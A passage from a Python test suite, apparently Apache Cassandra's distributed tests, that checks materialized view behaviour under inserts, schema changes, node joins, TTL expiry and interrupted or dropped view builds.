assert_crc_check_chance_equal(session, "t_by_v", 0.3, view=True)
def test_prepared_statement(self):
"""Test basic insertions with prepared statement"""
session = self.prepare(user_table=True)
insertPrepared = session.prepare(
"INSERT INTO users (username, password, gender, state, birth_year) VALUES (?, ?, ?, ?, ?);"
)
selectPrepared = session.prepare(
"SELECT state, password, session_token FROM users_by_state WHERE state=?;"
)
# insert data
session.execute(insertPrepared.bind(('user1', 'ch@ngem3a', 'f', 'TX', 1968)))
session.execute(insertPrepared.bind(('user2', 'ch@ngem3b', 'm', 'CA', 1971)))
session.execute(insertPrepared.bind(('user3', 'ch@ngem3c', 'f', 'FL', 1978)))
session.execute(insertPrepared.bind(('user4', 'ch@ngem3d', 'm', 'TX', 1974)))
result = list(session.execute("SELECT * FROM users;"))
assert len(result) == 4, "Expecting {} users, got {}".format(4, len(result))
result = list(session.execute(selectPrepared.bind(['TX'])))
assert len(result) == 2, "Expecting {} users, got {}".format(2, len(result))
result = list(session.execute(selectPrepared.bind(['CA'])))
assert len(result) == 1, "Expecting {} users, got {}".format(1, len(result))
result = list(session.execute(selectPrepared.bind(['MA'])))
assert len(result) == 0, "Expecting {} users, got {}".format(0, len(result))
def test_immutable(self):
"""Test that a materialized view is immutable"""
session = self.prepare(user_table=True)
# cannot insert
assert_invalid(session, "INSERT INTO users_by_state (state, username) VALUES ('TX', 'user1');",
"Cannot directly modify a materialized view")
# cannot update
assert_invalid(session, "UPDATE users_by_state SET session_token='XYZ' WHERE username='user1' AND state = 'TX';",
"Cannot directly modify a materialized view")
# cannot delete a row
assert_invalid(session, "DELETE from users_by_state where state='TX';",
"Cannot directly modify a materialized view")
# cannot delete a cell
assert_invalid(session, "DELETE session_token from users_by_state where state='TX';",
"Cannot directly modify a materialized view")
# cannot alter a table
assert_invalid(session, "ALTER TABLE users_by_state ADD first_name varchar",
"Cannot use ALTER TABLE on Materialized View")
def test_drop_mv(self):
"""Test that we can drop a view properly"""
session = self.prepare(user_table=True)
# create another materialized view
session.execute(("CREATE MATERIALIZED VIEW users_by_birth_year AS "
"SELECT * FROM users WHERE birth_year IS NOT NULL AND "
"username IS NOT NULL PRIMARY KEY (birth_year, username)"))
result = list(session.execute(("SELECT * FROM system_schema.views "
"WHERE keyspace_name='ks' AND base_table_name='users' ALLOW FILTERING")))
assert len(result) == 2, "Expecting {} materialized view, got {}".format(2, len(result))
session.execute("DROP MATERIALIZED VIEW ks.users_by_state;")
result = list(session.execute(("SELECT * FROM system_schema.views "
"WHERE keyspace_name='ks' AND base_table_name='users' ALLOW FILTERING")))
assert len(result) == 1, "Expecting {} materialized view, got {}".format(1, len(result))
def test_drop_column(self):
"""Test that we cannot drop a column if it is used by a MV"""
session = self.prepare(user_table=True)
result = list(session.execute(("SELECT * FROM system_schema.views "
"WHERE keyspace_name='ks' AND base_table_name='users' ALLOW FILTERING")))
assert len(result) == 1, "Expecting {} materialized view, got {}".format(1, len(result))
assert_invalid(
session,
"ALTER TABLE ks.users DROP state;",
"Cannot drop column state on base table with materialized views."
)
def test_drop_table(self):
"""Test that we cannot drop a table without deleting its MVs first"""
session = self.prepare(user_table=True)
result = list(session.execute(("SELECT * FROM system_schema.views "
"WHERE keyspace_name='ks' AND base_table_name='users' ALLOW FILTERING")))
assert len(result) == 1, "Expecting {} materialized view, got {}".format(1, len(result))
assert_invalid(
session,
"DROP TABLE ks.users;",
"Cannot drop table when materialized views still depend on it"
)
result = list(session.execute(("SELECT * FROM system_schema.views "
"WHERE keyspace_name='ks' AND base_table_name='users' ALLOW FILTERING")))
assert len(result) == 1, "Expecting {} materialized view, got {}".format(1, len(result))
session.execute("DROP MATERIALIZED VIEW ks.users_by_state;")
session.execute("DROP TABLE ks.users;")
result = list(session.execute(("SELECT * FROM system_schema.views "
"WHERE keyspace_name='ks' AND base_table_name='users' ALLOW FILTERING")))
assert len(result) == 0, "Expecting {} materialized view, got {}".format(1, len(result))
def test_clustering_column(self):
"""Test that we can use clustering columns as primary key for a materialized view"""
session = self.prepare(consistency_level=ConsistencyLevel.QUORUM)
session.execute(("CREATE TABLE users (username varchar, password varchar, gender varchar, "
"session_token varchar, state varchar, birth_year bigint, "
"PRIMARY KEY (username, state, birth_year));"))
# create a materialized view that use a compound key
session.execute(("CREATE MATERIALIZED VIEW users_by_state_birth_year "
"AS SELECT * FROM users WHERE state IS NOT NULL AND birth_year IS NOT NULL "
"AND username IS NOT NULL PRIMARY KEY (state, birth_year, username)"))
session.cluster.control_connection.wait_for_schema_agreement()
self._insert_data(session)
result = list(session.execute("SELECT * FROM ks.users_by_state_birth_year WHERE state='TX'"))
assert len(result) == 2, "Expecting {} users, got {}".format(2, len(result))
result = list(session.execute("SELECT * FROM ks.users_by_state_birth_year WHERE state='TX' AND birth_year=1968"))
assert len(result) == 1, "Expecting {} users, got {}".format(1, len(result))
def _add_dc_after_mv_test(self, rf, nts):
"""
@jira_ticket CASSANDRA-10978
Add datacenter with configurable replication.
"""
session = self.prepare(rf=rf)
logger.debug("Creating schema")
session.execute("CREATE TABLE t (id int PRIMARY KEY, v int)")
session.execute(("CREATE MATERIALIZED VIEW t_by_v AS SELECT * FROM t "
"WHERE v IS NOT NULL AND id IS NOT NULL PRIMARY KEY (v, id)"))
logger.debug("Writing 1k to base")
for i in range(1000):
session.execute("INSERT INTO t (id, v) VALUES ({id}, {v})".format(id=i, v=-i))
logger.debug("Reading 1k from view")
for i in range(1000):
assert_one(session, "SELECT * FROM t_by_v WHERE v = {}".format(-i), [-i, i])
logger.debug("Reading 1k from base")
for i in range(1000):
assert_one(session, "SELECT * FROM t WHERE id = {}".format(i), [i, -i])
logger.debug("Bootstrapping new node in another dc")
node4 = new_node(self.cluster, data_center='dc2')
node4.start(wait_for_binary_proto=True, jvm_args=["-Dcassandra.migration_task_wait_in_seconds={}".format(MIGRATION_WAIT)])
logger.debug("Bootstrapping new node in another dc")
node5 = new_node(self.cluster, remote_debug_port='1414', data_center='dc2')
node5.start(jvm_args=["-Dcassandra.migration_task_wait_in_seconds={}".format(MIGRATION_WAIT)], wait_for_binary_proto=True)
if nts:
session.execute("alter keyspace ks with replication = {'class':'NetworkTopologyStrategy', 'dc1':1, 'dc2':1}")
session.execute("alter keyspace system_auth with replication = {'class':'NetworkTopologyStrategy', 'dc1':1, 'dc2':1}")
session.execute("alter keyspace system_traces with replication = {'class':'NetworkTopologyStrategy', 'dc1':1, 'dc2':1}")
node4.nodetool('rebuild dc1')
node5.nodetool('rebuild dc1')
cl = ConsistencyLevel.LOCAL_ONE if nts else ConsistencyLevel.ONE
session2 = self.patient_exclusive_cql_connection(node4, consistency_level=cl)
logger.debug("Verifying data from new node in view")
for i in range(1000):
assert_one(session2, "SELECT * FROM ks.t_by_v WHERE v = {}".format(-i), [-i, i])
logger.debug("Inserting 100 into base")
for i in range(1000, 1100):
session.execute("INSERT INTO t (id, v) VALUES ({id}, {v})".format(id=i, v=-i))
logger.debug("Verify 100 in view")
for i in range(1000, 1100):
assert_one(session, "SELECT * FROM t_by_v WHERE v = {}".format(-i), [-i, i])
@pytest.mark.resource_intensive
def test_add_dc_after_mv_simple_replication(self):
"""
@jira_ticket CASSANDRA-10634
Test that materialized views work as expected when adding a datacenter with SimpleStrategy.
"""
self._add_dc_after_mv_test(1, False)
@pytest.mark.resource_intensive
def test_add_dc_after_mv_network_replication(self):
"""
@jira_ticket CASSANDRA-10634
Test that materialized views work as expected when adding a datacenter with NetworkTopologyStrategy.
"""
self._add_dc_after_mv_test({'dc1': 1}, True)
@pytest.mark.resource_intensive
def test_add_node_after_mv(self):
"""
@jira_ticket CASSANDRA-10978
Test that materialized views work as expected when adding a node.
"""
session = self.prepare()
session.execute("CREATE TABLE t (id int PRIMARY KEY, v int)")
session.execute(("CREATE MATERIALIZED VIEW t_by_v AS SELECT * FROM t "
"WHERE v IS NOT NULL AND id IS NOT NULL PRIMARY KEY (v, id)"))
for i in range(1000):
session.execute("INSERT INTO t (id, v) VALUES ({id}, {v})".format(id=i, v=-i))
for i in range(1000):
assert_one(session, "SELECT * FROM t_by_v WHERE v = {}".format(-i), [-i, i])
node4 = new_node(self.cluster)
node4.start(wait_for_binary_proto=True, jvm_args=["-Dcassandra.migration_task_wait_in_seconds={}".format(MIGRATION_WAIT)])
session2 = self.patient_exclusive_cql_connection(node4)
"""
@jira_ticket CASSANDRA-12984
Assert that MVs are marked as build after bootstrap. Otherwise newly streamed MVs will be built again
"""
assert_one(session2, "SELECT count(*) FROM system.built_views WHERE keyspace_name = 'ks' AND view_name = 't_by_v'", [1])
for i in range(1000):
assert_one(session2, "SELECT * FROM ks.t_by_v WHERE v = {}".format(-i), [-i, i])
for i in range(1000, 1100):
session.execute("INSERT INTO t (id, v) VALUES ({id}, {v})".format(id=i, v=-i))
for i in range(1000, 1100):
assert_one(session, "SELECT * FROM t_by_v WHERE v = {}".format(-i), [-i, i])
def test_insert_during_range_movement_rf1(self):
self._base_test_insert_during_range_movement(rf=1)
def test_insert_during_range_movement_rf2(self):
self._base_test_insert_during_range_movement(rf=2)
def test_insert_during_range_movement_rf3(self):
self._base_test_insert_during_range_movement(rf=3)
def _base_test_insert_during_range_movement(self, rf):
"""
@jira_ticket CASSANDRA-14251
Test that materialized views replication work in the middle of a join
for different replication factors.
"""
session = self.prepare(rf=rf)
logger.debug("Creating table and view")
session.execute("CREATE TABLE t (id int PRIMARY KEY, v int)")
session.execute(("CREATE MATERIALIZED VIEW t_by_v AS SELECT * FROM t "
"WHERE v IS NOT NULL AND id IS NOT NULL PRIMARY KEY (v, id)"))
logger.debug("Starting new node4 in write survey mode")
node4 = new_node(self.cluster)
# Set batchlog.replay_timeout_seconds=1 so we can ensure batchlog will be replayed below
node4.start(wait_for_binary_proto=True, jvm_args=["-Dcassandra.write_survey=true",
"-Dcassandra.batchlog.replay_timeout_in_ms=1"])
logger.debug("Insert data while node4 is joining")
for i in range(1000):
session.execute("INSERT INTO t (id, v) VALUES ({id}, {v})".format(id=i, v=-i))
logger.debug("Finish joining node4")
node4.nodetool("join")
logger.debug('Replay batchlogs')
time.sleep(0.001) # Wait batchlog.replay_timeout_in_ms=1 (ms)
self._replay_batchlogs()
logger.debug("Verify data")
for i in range(1000):
assert_one(session, "SELECT * FROM t_by_v WHERE v = {}".format(-i), [-i, i])
@pytest.mark.resource_intensive
def test_add_node_after_wide_mv_with_range_deletions(self):
"""
@jira_ticket CASSANDRA-11670
Test that materialized views work with wide materialized views as expected when adding a node.
"""
session = self.prepare()
session.execute("CREATE TABLE t (id int, v int, PRIMARY KEY (id, v)) WITH compaction = { 'class': 'SizeTieredCompactionStrategy', 'enabled': 'false' }")
session.execute(("CREATE MATERIALIZED VIEW t_by_v AS SELECT * FROM t "
"WHERE v IS NOT NULL AND id IS NOT NULL PRIMARY KEY (v, id)"))
for i in range(10):
for j in range(100):
session.execute("INSERT INTO t (id, v) VALUES ({id}, {v})".format(id=i, v=j))
self.cluster.flush()
for i in range(10):
for j in range(100):
assert_one(session, "SELECT * FROM t WHERE id = {} and v = {}".format(i, j), [i, j])
assert_one(session, "SELECT * FROM t_by_v WHERE id = {} and v = {}".format(i, j), [j, i])
for i in range(10):
for j in range(100):
if j % 10 == 0:
session.execute("DELETE FROM t WHERE id = {} AND v >= {} and v < {}".format(i, j, j + 2))
self.cluster.flush()
for i in range(10):
for j in range(100):
if j % 10 == 0 or (j - 1) % 10 == 0:
assert_none(session, "SELECT * FROM t WHERE id = {} and v = {}".format(i, j))
assert_none(session, "SELECT * FROM t_by_v WHERE id = {} and v = {}".format(i, j))
else:
assert_one(session, "SELECT * FROM t WHERE id = {} and v = {}".format(i, j), [i, j])
assert_one(session, "SELECT * FROM t_by_v WHERE id = {} and v = {}".format(i, j), [j, i])
node4 = new_node(self.cluster)
node4.set_configuration_options(values={'max_mutation_size_in_kb': 20}) # CASSANDRA-11670
logger.debug("Start join at {}".format(time.strftime("%H:%M:%S")))
node4.start(wait_for_binary_proto=True, jvm_args=["-Dcassandra.migration_task_wait_in_seconds={}".format(MIGRATION_WAIT)])
session2 = self.patient_exclusive_cql_connection(node4)
for i in range(10):
for j in range(100):
if j % 10 == 0 or (j - 1) % 10 == 0:
assert_none(session2, "SELECT * FROM ks.t WHERE id = {} and v = {}".format(i, j))
assert_none(session2, "SELECT * FROM ks.t_by_v WHERE id = {} and v = {}".format(i, j))
else:
assert_one(session2, "SELECT * FROM ks.t WHERE id = {} and v = {}".format(i, j), [i, j])
assert_one(session2, "SELECT * FROM ks.t_by_v WHERE id = {} and v = {}".format(i, j), [j, i])
for i in range(10):
for j in range(100, 110):
session.execute("INSERT INTO t (id, v) VALUES ({id}, {v})".format(id=i, v=j))
for i in range(10):
for j in range(110):
if j < 100 and (j % 10 == 0 or (j - 1) % 10 == 0):
assert_none(session2, "SELECT * FROM ks.t WHERE id = {} and v = {}".format(i, j))
assert_none(session2, "SELECT * FROM ks.t_by_v WHERE id = {} and v = {}".format(i, j))
else:
assert_one(session2, "SELECT * FROM ks.t WHERE id = {} and v = {}".format(i, j), [i, j])
assert_one(session2, "SELECT * FROM ks.t_by_v WHERE id = {} and v = {}".format(i, j), [j, i])
@pytest.mark.resource_intensive
def test_add_node_after_very_wide_mv(self):
"""
@jira_ticket CASSANDRA-11670
Test that materialized views work with very wide materialized views as expected when adding a node.
"""
session = self.prepare()
session.execute("CREATE TABLE t (id int, v int, PRIMARY KEY (id, v))")
session.execute(("CREATE MATERIALIZED VIEW t_by_v AS SELECT * FROM t "
"WHERE v IS NOT NULL AND id IS NOT NULL PRIMARY KEY (v, id)"))
for i in range(5):
for j in range(5000):
session.execute("INSERT INTO t (id, v) VALUES ({id}, {v})".format(id=i, v=j))
self.cluster.flush()
for i in range(5):
for j in range(5000):
assert_one(session, "SELECT * FROM t_by_v WHERE id = {} and v = {}".format(i, j), [j, i])
node4 = new_node(self.cluster)
node4.set_configuration_options(values={'max_mutation_size_in_kb': 20}) # CASSANDRA-11670
logger.debug("Start join at {}".format(time.strftime("%H:%M:%S")))
node4.start(wait_for_binary_proto=True, jvm_args=["-Dcassandra.migration_task_wait_in_seconds={}".format(MIGRATION_WAIT)])
session2 = self.patient_exclusive_cql_connection(node4)
for i in range(5):
for j in range(5000):
assert_one(session2, "SELECT * FROM ks.t_by_v WHERE id = {} and v = {}".format(i, j), [j, i])
for i in range(5):
for j in range(5100):
session.execute("INSERT INTO t (id, v) VALUES ({id}, {v})".format(id=i, v=j))
for i in range(5):
for j in range(5100):
assert_one(session, "SELECT * FROM t_by_v WHERE id = {} and v = {}".format(i, j), [j, i])
@pytest.mark.resource_intensive
def test_add_write_survey_node_after_mv(self):
"""
@jira_ticket CASSANDRA-10621
@jira_ticket CASSANDRA-10978
Test that materialized views work as expected when adding a node in write survey mode.
"""
session = self.prepare()
session.execute("CREATE TABLE t (id int PRIMARY KEY, v int)")
session.execute(("CREATE MATERIALIZED VIEW t_by_v AS SELECT * FROM t "
"WHERE v IS NOT NULL AND id IS NOT NULL PRIMARY KEY (v, id)"))
for i in range(1000):
session.execute("INSERT INTO t (id, v) VALUES ({id}, {v})".format(id=i, v=-i))
for i in range(1000):
assert_one(session, "SELECT * FROM t_by_v WHERE v = {}".format(-i), [-i, i])
node4 = new_node(self.cluster)
node4.start(wait_for_binary_proto=True, jvm_args=["-Dcassandra.write_survey=true", "-Dcassandra.migration_task_wait_in_seconds={}".format(MIGRATION_WAIT)])
for i in range(1000, 1100):
session.execute("INSERT INTO t (id, v) VALUES ({id}, {v})".format(id=i, v=-i))
for i in range(1100):
assert_one(session, "SELECT * FROM t_by_v WHERE v = {}".format(-i), [-i, i])
def test_allow_filtering(self):
"""Test that allow filtering works as usual for a materialized view"""
session = self.prepare()
session.execute("CREATE TABLE t (id int PRIMARY KEY, v int, v2 text, v3 decimal)")
session.execute(("CREATE MATERIALIZED VIEW t_by_v AS SELECT * FROM t "
"WHERE v IS NOT NULL AND id IS NOT NULL PRIMARY KEY (v, id)"))
session.execute(("CREATE MATERIALIZED VIEW t_by_v2 AS SELECT * FROM t "
"WHERE v2 IS NOT NULL AND id IS NOT NULL PRIMARY KEY (v2, id)"))
for i in range(1000):
session.execute("INSERT INTO t (id, v, v2, v3) VALUES ({v}, {v}, 'a', 3.0)".format(v=i))
for i in range(1000):
assert_one(session, "SELECT * FROM t_by_v WHERE v = {v}".format(v=i), [i, i, 'a', 3.0])
rows = list(session.execute("SELECT * FROM t_by_v2 WHERE v2 = 'a'"))
assert len(rows) == 1000, "Expected 1000 rows but got {}".format(len(rows))
assert_invalid(session, "SELECT * FROM t_by_v WHERE v = 1 AND v2 = 'a'")
assert_invalid(session, "SELECT * FROM t_by_v2 WHERE v2 = 'a' AND v = 1")
for i in range(1000):
assert_one(
session,
"SELECT * FROM t_by_v WHERE v = {} AND v3 = 3.0 ALLOW FILTERING".format(i),
[i, i, 'a', 3.0]
)
assert_one(
session,
"SELECT * FROM t_by_v2 WHERE v2 = 'a' AND v = {} ALLOW FILTERING".format(i),
['a', i, i, 3.0]
)
def test_secondary_index(self):
"""Test that secondary indexes cannot be created on a materialized view"""
session = self.prepare()
session.execute("CREATE TABLE t (id int PRIMARY KEY, v int, v2 text, v3 decimal)")
session.execute(("CREATE MATERIALIZED VIEW t_by_v AS SELECT * FROM t "
"WHERE v IS NOT NULL AND id IS NOT NULL PRIMARY KEY (v, id)"))
assert_invalid(session, "CREATE INDEX ON t_by_v (v2)",
"Secondary indexes are not supported on materialized views")
def test_ttl(self):
"""
Test that TTL works as expected for a materialized view
@expected_result The TTL is propagated properly between tables.
"""
session = self.prepare()
session.execute("CREATE TABLE t (id int PRIMARY KEY, v int, v2 int, v3 int)")
session.execute(("CREATE MATERIALIZED VIEW t_by_v2 AS SELECT * FROM t "
"WHERE v2 IS NOT NULL AND id IS NOT NULL PRIMARY KEY (v2, id)"))
for i in range(100):
session.execute("INSERT INTO t (id, v, v2, v3) VALUES ({v}, {v}, {v}, {v}) USING TTL 10".format(v=i))
for i in range(100):
assert_one(session, "SELECT * FROM t_by_v2 WHERE v2 = {}".format(i), [i, i, i, i])
time.sleep(20)
rows = list(session.execute("SELECT * FROM t_by_v2"))
assert len(rows) == 0, "Expected 0 rows but got {}".format(len(rows))
def test_query_all_new_column(self):
"""
Test that a materialized view created with a 'SELECT *' works as expected when adding a new column
@expected_result The new column is present in the view.
"""
session = self.prepare(user_table=True)
self._insert_data(session)
assert_one(
session,
"SELECT * FROM users_by_state WHERE state = 'TX' AND username = 'user1'",
['TX', 'user1', 1968, 'f', 'ch@ngem3a', None]
)
session.execute("ALTER TABLE users ADD first_name varchar;")
results = list(session.execute("SELECT * FROM users_by_state WHERE state = 'TX' AND username = 'user1'"))
assert len(results) == 1
assert hasattr(results[0], 'first_name'), 'Column "first_name" not found'
assert_one(
session,
"SELECT * FROM users_by_state WHERE state = 'TX' AND username = 'user1'",
['TX', 'user1', 1968, None, 'f', 'ch@ngem3a', None]
)
def test_query_new_column(self):
"""
Test that a materialized view created with 'SELECT <col1, ...>' works as expected when adding a new column
@expected_result The new column is not present in the view.
"""
session = self.prepare(user_table=True)
session.execute(("CREATE MATERIALIZED VIEW users_by_state2 AS SELECT state, username FROM users "
"WHERE STATE IS NOT NULL AND USERNAME IS NOT NULL PRIMARY KEY (state, username)"))
self._insert_data(session)
assert_one(
session,
"SELECT * FROM users_by_state2 WHERE state = 'TX' AND username = 'user1'",
['TX', 'user1']
)
session.execute("ALTER TABLE users ADD first_name varchar;")
results = list(session.execute("SELECT * FROM users_by_state2 WHERE state = 'TX' AND username = 'user1'"))
assert len(results) == 1
assert not hasattr(results[0], 'first_name'), 'Column "first_name" found in view'
assert_one(
session,
"SELECT * FROM users_by_state2 WHERE state = 'TX' AND username = 'user1'",
['TX', 'user1']
)
def test_rename_column(self):
"""
Test that a materialized view created with a 'SELECT *' works as expected when renaming a column
@expected_result The column is also renamed in the view.
"""
session = self.prepare(user_table=True)
self._insert_data(session)
assert_one(
session,
"SELECT * FROM users_by_state WHERE state = 'TX' AND username = 'user1'",
['TX', 'user1', 1968, 'f', 'ch@ngem3a', None]
)
session.execute("ALTER TABLE users RENAME username TO user")
results = list(session.execute("SELECT * FROM users_by_state WHERE state = 'TX' AND user = 'user1'"))
assert len(results) == 1
assert hasattr(results[0], 'user'), 'Column "user" not found'
assert_one(
session,
"SELECT state, user, birth_year, gender FROM users_by_state WHERE state = 'TX' AND user = 'user1'",
['TX', 'user1', 1968, 'f']
)
def test_rename_column_atomicity(self):
"""
Test that column renaming is atomically done between a table and its materialized views
@jira_ticket CASSANDRA-12952
"""
session = self.prepare(nodes=1, user_table=True, install_byteman=True)
node = self.cluster.nodelist()[0]
self._insert_data(session)
assert_one(
session,
"SELECT * FROM users_by_state WHERE state = 'TX' AND username = 'user1'",
['TX', 'user1', 1968, 'f', 'ch@ngem3a', None]
)
# Rename a column with an injected byteman rule to kill the node after the first schema update
self.fixture_dtest_setup.allow_log_errors = True
script_version = '4x' if self.cluster.version() >= '4' else '3x'
node.byteman_submit(['./byteman/merge_schema_failure_{}.btm'.format(script_version)])
with pytest.raises(NoHostAvailable):
session.execute("ALTER TABLE users RENAME username TO user")
logger.debug('Restarting node')
node.stop()
node.start(wait_for_binary_proto=True)
session = self.patient_cql_connection(node, consistency_level=ConsistencyLevel.ONE)
# Both the table and its view should have the new schema after restart
assert_one(
session,
"SELECT * FROM ks.users WHERE state = 'TX' AND user = 'user1' ALLOW FILTERING",
['user1', 1968, 'f', 'ch@ngem3a', None, 'TX']
)
assert_one(
session,
"SELECT * FROM ks.users_by_state WHERE state = 'TX' AND user = 'user1'",
['TX', 'user1', 1968, 'f', 'ch@ngem3a', None]
)
def test_lwt(self):
"""Test that lightweight transaction behave properly with a materialized view"""
session = self.prepare()
session.execute("CREATE TABLE t (id int PRIMARY KEY, v int, v2 text, v3 decimal)")
session.execute(("CREATE MATERIALIZED VIEW t_by_v AS SELECT * FROM t "
"WHERE v IS NOT NULL AND id IS NOT NULL PRIMARY KEY (v, id)"))
logger.debug("Inserting initial data using IF NOT EXISTS")
for i in range(1000):
session.execute(
"INSERT INTO t (id, v, v2, v3) VALUES ({v}, {v}, 'a', 3.0) IF NOT EXISTS".format(v=i)
)
self._replay_batchlogs()
logger.debug("All rows should have been inserted")
for i in range(1000):
assert_one(
session,
"SELECT * FROM t_by_v WHERE v = {}".format(i),
[i, i, 'a', 3.0]
)
logger.debug("Tyring to UpInsert data with a different value using IF NOT EXISTS")
for i in range(1000):
v = i * 2
session.execute(
"INSERT INTO t (id, v, v2, v3) VALUES ({id}, {v}, 'a', 3.0) IF NOT EXISTS".format(id=i, v=v)
)
self._replay_batchlogs()
logger.debug("No rows should have changed")
for i in range(1000):
assert_one(
session,
"SELECT * FROM t_by_v WHERE v = {}".format(i),
[i, i, 'a', 3.0]
)
logger.debug("Update the 10 first rows with a different value")
for i in range(1000):
v = i + 2000
session.execute(
"UPDATE t SET v={v} WHERE id = {id} IF v < 10".format(id=i, v=v)
)
self._replay_batchlogs()
logger.debug("Verify that only the 10 first rows changed.")
results = list(session.execute("SELECT * FROM t_by_v;"))
assert len(results) == 1000
for i in range(1000):
v = i + 2000 if i < 10 else i
assert_one(
session,
"SELECT * FROM t_by_v WHERE v = {}".format(v),
[v, i, 'a', 3.0]
)
logger.debug("Deleting the first 10 rows")
for i in range(1000):
v = i + 2000
session.execute(
"DELETE FROM t WHERE id = {id} IF v = {v} ".format(id=i, v=v)
)
self._replay_batchlogs()
logger.debug("Verify that only the 10 first rows have been deleted.")
results = list(session.execute("SELECT * FROM t_by_v;"))
assert len(results) == 990
for i in range(10, 1000):
assert_one(
session,
"SELECT * FROM t_by_v WHERE v = {}".format(i),
[i, i, 'a', 3.0]
)
def test_interrupt_build_process(self):
"""Test that an interrupted MV build process is resumed as it should"""
options = {'hinted_handoff_enabled': False}
if self.cluster.version() >= '4':
options['concurrent_materialized_view_builders'] = 4
session = self.prepare(options=options, install_byteman=True)
node1, node2, node3 = self.cluster.nodelist()
logger.debug("Avoid premature MV build finalization with byteman")
for node in self.cluster.nodelist():
if self.cluster.version() >= '4':
node.byteman_submit(['./byteman/4.0/skip_view_build_finalization.btm'])
node.byteman_submit(['./byteman/4.0/skip_view_build_task_finalization.btm'])
else:
node.byteman_submit(['./byteman/pre4.0/skip_finish_view_build_status.btm'])
node.byteman_submit(['./byteman/pre4.0/skip_view_build_update_distributed.btm'])
session.execute("CREATE TABLE t (id int PRIMARY KEY, v int, v2 text, v3 decimal)")
logger.debug("Inserting initial data")
for i in range(10000):
session.execute(
"INSERT INTO t (id, v, v2, v3) VALUES ({v}, {v}, 'a', 3.0) IF NOT EXISTS".format(v=i)
)
logger.debug("Create a MV")
session.execute(("CREATE MATERIALIZED VIEW t_by_v AS SELECT * FROM t "
"WHERE v IS NOT NULL AND id IS NOT NULL PRIMARY KEY (v, id)"))
logger.debug("Wait and ensure the MV build has started. Waiting up to 2 minutes.")
self._wait_for_view_build_start(session, 'ks', 't_by_v', wait_minutes=2)
logger.debug("Stop the cluster. Interrupt the MV build process.")
self.cluster.stop()
logger.debug("Checking logs to verify that the view build tasks have been created")
for node in self.cluster.nodelist():
assert node.grep_log('Starting new view build', filename='debug.log')
assert not node.grep_log('Resuming view build', filename='debug.log')
node.mark_log(filename='debug.log')
logger.debug("Restart the cluster")
self.cluster.start()
session = self.patient_cql_connection(node1)
session.execute("USE ks")
logger.debug("MV shouldn't be built yet.")
assert len(list(session.execute("SELECT COUNT(*) FROM t_by_v"))) != 10000
logger.debug("Wait and ensure the MV build resumed. Waiting up to 2 minutes.")
self._wait_for_view("ks", "t_by_v")
logger.debug("Verify all data")
assert_one(session, "SELECT COUNT(*) FROM t_by_v", [10000])
for i in range(10000):
assert_one(
session,
"SELECT * FROM t_by_v WHERE v = {}".format(i),
[i, i, 'a', 3.0],
cl=ConsistencyLevel.ALL
)
logger.debug("Checking logs to verify that some view build tasks have been resumed")
for node in self.cluster.nodelist():
assert node.grep_log('Resuming view build', filename='debug.log')
@pytest.mark.skip(reason="Frequently fails in CI. Skipping until fixed as tracked by CASSANDRA-14148")
@since('4.0')
def test_drop_while_building(self):
"""Test that a parallel MV build is interrupted when the view is removed"""
session = self.prepare(options={'concurrent_materialized_view_builders': 4}, install_byteman=True)
session.execute("CREATE TABLE t (id int PRIMARY KEY, v int, v2 text, v3 decimal)")
logger.debug("Inserting initial data")
for i in range(5000):
session.execute("INSERT INTO t (id, v, v2, v3) VALUES ({v}, {v}, 'a', 3.0) IF NOT EXISTS".format(v=i))
logger.debug("Slowing down MV build with byteman")
for node in self.cluster.nodelist():
node.byteman_submit(['./byteman/4.0/view_builder_task_sleep.btm'])
logger.debug("Create a MV")
session.execute(("CREATE MATERIALIZED VIEW t_by_v AS SELECT * FROM t "
"WHERE v IS NOT NULL AND id IS NOT NULL PRIMARY KEY (v, id)"))
logger.debug("Wait and ensure the MV build has started. Waiting up to 2 minutes.")
self._wait_for_view_build_start(session, 'ks', 't_by_v', wait_minutes=2)
logger.debug("Drop the MV while it is still building")
session.execute("DROP MATERIALIZED VIEW t_by_v")
logger.debug("Verify that the build has been stopped before its finalization without errors")
for node in self.cluster.nodelist():
self.check_logs_for_errors()
assert not node.grep_log('Marking view', filename='debug.log')
assert node.grep_log('Stopping current view builder due to schema change', filename='debug.log')
logger.debug("Verify that the view has been removed")
failed = False
try:
session.execute("SELECT COUNT(*) FROM t_by_v")
except InvalidRequest:
failed = True
self.assertTrue(failed, "The view shouldn't be queryable")
self._assert_view_meta(session, views=1, exists=False)
logger.debug("Create the MV again")
session.execute(("CREATE MATERIALIZED VIEW t_by_v AS SELECT * FROM t "
"WHERE v IS NOT NULL AND id IS NOT NULL PRIMARY KEY (v, id)"))
logger.debug("Verify that the MV has been successfully created")
self._wait_for_view('ks', 't_by_v')
assert_one(session, "SELECT COUNT(*) FROM t_by_v", [5000])
@since('4.0')
def test_drop_with_stopped_build(self):
"""Test that MV whose build has been stopped with `nodetool stop` can be dropped"""
session = self.prepare(options={'concurrent_materialized_view_builders': 4}, install_byteman=True)
session.execute("CREATE TABLE t (id int PRIMARY KEY, v int, v2 text, v3 decimal)")
nodes = self.cluster.nodelist()
logger.debug("Inserting initial data")
for i in range(5000):
session.execute("INSERT INTO t (id, v, v2, v3) VALUES ({v}, {v}, 'a', 3.0) IF NOT EXISTS".format(v=i))
logger.debug("Slowing down MV build with byteman")
for node in nodes:
node.byteman_submit(['./byteman/4.0/view_builder_task_sleep.btm'])
logger.debug("Create a MV")
session.execute(("CREATE MATERIALIZED VIEW t_by_v AS SELECT * FROM t "
"WHERE v IS NOT NULL AND id IS NOT NULL PRIMARY KEY (v, id)"))
logger.debug("Wait and ensure the MV build has started. Waiting up to 2 minutes.")
self._wait_for_view_build_start(session, 'ks', 't_by_v', wait_minutes=2)
logger.debug("Stopping all running view build tasks with nodetool")
for node in nodes:
node.watch_log_for('Starting new view build for range', filename='debug.log', timeout=120)
node.nodetool('stop VIEW_BUILD')
logger.debug("Checking logs to verify that some view build tasks have been stopped")
for node in nodes:
node.watch_log_for('Stopped build for view', filename='debug.log', timeout=120)
node.watch_log_for('Compaction interrupted: View build', filename='system.log', timeout=120)
self.check_logs_for_errors()
logger.debug("Drop the MV while it is still building")
session.execute("DROP MATERIALIZED VIEW t_by_v")
logger.debug("Verify that the build has been stopped before its finalization without errors")
for node in nodes:
self.check_logs_for_errors()
assert not node.grep_log('Marking view', filename='debug.log')
assert node.grep_log('Stopping current view builder due to schema change', filename='debug.log')
logger.debug("Verify that the view has been removed")
failed = False
try:
session.execute("SELECT COUNT(*) FROM t_by_v")
except InvalidRequest:
failed = True
assert failed, "The view shouldn't be queryable"
logger.debug("Create the MV again")
